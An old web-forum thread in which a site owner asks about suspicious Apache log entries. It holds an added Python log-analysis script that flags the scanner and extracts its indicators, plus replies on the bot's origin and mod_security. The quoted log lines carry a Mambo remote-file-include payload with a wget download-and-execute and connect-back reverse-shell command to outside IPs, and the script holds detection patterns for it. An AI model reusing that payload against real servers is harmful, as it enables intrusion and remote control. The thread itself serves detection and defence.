Apache Server configuration support - how to recognize spammers in logs?


Jake Barnes

2006-02-17, 10:29 pm


Would comment spammers be looking for the comment and trackback
addresses of possibly installed weblog-type software? I noticed this
bit in my logs:


209.250.116.251 - - [22/Jan/2006:19:35:56 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [22/Jan/2006:19:35:58 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [22/Jan/2006:19:35:59 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:00 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:01 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:02 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:03 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [22/Jan/2006:19:36:04 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"



What's it all about? drupal? phpgroupware? wordpress?

Is this all PHP software? Could it be a bot looking for vulnerable
software?
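As an added example (not part of the original post), here is a small Python script that does what the question asks: it parses Apache combined-format lines, URL-decodes the request, and flags a client as a scanner when the request carries the Mambo/Joomla remote-file-include markers visible in the excerpt (mosConfig_absolute_path pointing at an external URL, _REQUEST[...]/GLOBALS= in the query string, a cmd= parameter with a download-and-execute pipeline), when it blindly POSTs to xmlrpc.php under guessed application directories, or when it collects a run of 404s within a few seconds. It also pulls the include URL, the wget target and the connect-back host/port out of the decoded cmd= payload as indicators worth blocking or reporting. The indicator names, the 404 burst thresholds and the one benign request from 198.51.100.7 are this example's own assumptions; the eight scanner lines are the ones from the post above, rejoined where the forum wrapped them.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Apache "combined" log format, the format of the excerpt in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Indicators run against the URL-decoded request. Names are this example's own;
# they describe the two probe families visible in the excerpt.
INDICATORS = {
    # mosConfig_absolute_path pointing at an external URL: remote file include
    "rfi_include": re.compile(r"(?i)mosConfig_absolute_path=https?://"),
    # _REQUEST[...] / GLOBALS= in the query string: register_globals poisoning
    "globals_poison": re.compile(r"(?i)(?:_REQUEST\[|&GLOBALS=)"),
    # cmd= carrying a download-and-execute shell pipeline
    "shell_command": re.compile(r"(?i)[?&]cmd=.*(?:wget|curl|chmod|/tmp)"),
}
XMLRPC_RE = re.compile(r"/xmlrpc\.php$")
INCLUDE_SRC_RE = re.compile(r"(?i)mosConfig_absolute_path=(https?://[^&\s]+)")
WGET_RE = re.compile(r"wget\s+([^\s;|&]+)")
CONNECT_BACK_RE = re.compile(r"\./\w+\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})")

def parse_line(line):
    """Parse one combined-format line into a dict; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    e["decoded"] = unquote(e["path"])  # %20 -> space, so regexes see the real payload
    return e

def classify(entry):
    """Return the indicator names that fire on one parsed request."""
    tags = [n for n, rx in INDICATORS.items() if rx.search(entry["decoded"])]
    if entry["method"] == "POST" and XMLRPC_RE.search(entry["decoded"].split("?")[0]):
        tags.append("xmlrpc_probe")
    return tags

def extract_iocs(decoded):
    """Include URL, wget target and connect-back (host, port) from an RFI payload."""
    return {"include_source": set(INCLUDE_SRC_RE.findall(decoded)),
            "download": set(WGET_RE.findall(decoded)),
            "connect_back": set(CONNECT_BACK_RE.findall(decoded))}

def analyze(lines, burst_404=4, burst_window=60):
    """Group requests by client IP and flag scanners: any indicator hit, or at least
    burst_404 404 responses inside burst_window seconds (a bot guessing application
    directories leaves a run of 404s one second apart, as in the excerpt)."""
    per_ip = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e:
            per_ip[e["ip"]].append(e)
    report = {}
    for ip, entries in per_ip.items():
        entries.sort(key=lambda e: e["time"])
        tags, paths = set(), set()
        iocs = {"include_source": set(), "download": set(), "connect_back": set()}
        for e in entries:
            hits = classify(e)
            tags.update(hits)
            paths.add(e["decoded"].split("?")[0])
            if hits:
                for kind, values in extract_iocs(e["decoded"]).items():
                    iocs[kind].update(values)
        nf = [e["time"] for e in entries if e["status"] == 404]
        burst = any((nf[i + burst_404 - 1] - nf[i]).total_seconds() <= burst_window
                    for i in range(len(nf) - burst_404 + 1))
        report[ip] = {"requests": len(entries), "not_found": len(nf), "paths": sorted(paths),
                      "tags": sorted(tags), "iocs": iocs, "burst_404": burst,
                      "scanner": bool(tags) or burst}
    return report

# The eight lines from the post (rejoined where the forum wrapped them) plus one
# constructed benign request from another client, so both outcomes appear.
SAMPLE_LOG = [
    '209.250.116.251 - - [22/Jan/2006:19:35:56 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '209.250.116.251 - - [22/Jan/2006:19:35:58 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '209.250.116.251 - - [22/Jan/2006:19:35:59 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '209.250.116.251 - - [22/Jan/2006:19:36:00 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '209.250.116.251 - - [22/Jan/2006:19:36:01 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '209.250.116.251 - - [22/Jan/2006:19:36:02 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '209.250.116.251 - - [22/Jan/2006:19:36:03 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '209.250.116.251 - - [22/Jan/2006:19:36:04 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '198.51.100.7 - - [22/Jan/2006:19:40:12 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',  # constructed benign line
]

if __name__ == "__main__":
    for ip, r in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {r['requests']} requests, {r['not_found']} x 404, scanner={r['scanner']}")
        print("  tags:", ", ".join(r["tags"]) or "-")
        for kind, values in r["iocs"].items():
            if values:
                print(f"  {kind}:", ", ".join(map(str, sorted(values))))
```

Run it against the excerpt and 209.250.116.251 is flagged on every signal at once: four RFI hits, four xmlrpc.php probes and eight 404s in eight seconds, with 209.16.85.15 (the include source), 216.103.82.214 (the wget target) and 217.160.242.90:8081 (the connect-back) extracted from the decoded cmd= string. The 404 status on every line means the requests did nothing here; the same script is far more interesting on a server that actually runs one of the probed applications, where a 200 on an RFI line is the signal to go looking in /tmp. Feeding it a real access_log is `analyze(open("/var/log/apache2/access_log"))`.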

Evan Platt

2006-02-17, 10:29 pm

On 15 Feb 2006 19:51:40 -0800, "Jake Barnes" <lkrubner@geocities.com>
wrote:

>209.250.116.251


CustName: Meserve, Mumpers & Hughes LLP
Address: 611 West Sixth Street, Suite 3201
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US
RegDate: 1998-12-16
Updated: 2005-05-09

Might want to e-mail them to make sure they don't have an infected
zombie machine. :-D
--
To reply, remove TheObvious from my e-mail address.
DiD

2006-02-17, 10:29 pm


"DiD" <notareal@mailspamout.com.invalid> wrote in message
news:43f47257$0$29104$5fc30a8@news.tiscali.it...
>
> I think that should be some kind of worm (anyone else have a clue?). I
> get some of those entries in my log too.


After googling a bit I found this discussion:

http://tinyurl.com/couo5

* exploits awstats.pl vulnerability


* exploits xmlrpc.php


MikeDawg

2006-02-17, 10:29 pm

I'd really recommend mod_security to filter out these sorts of
requests.

http://www.modsecurity.org


Copyright 2003 - 2009 webservertalk.com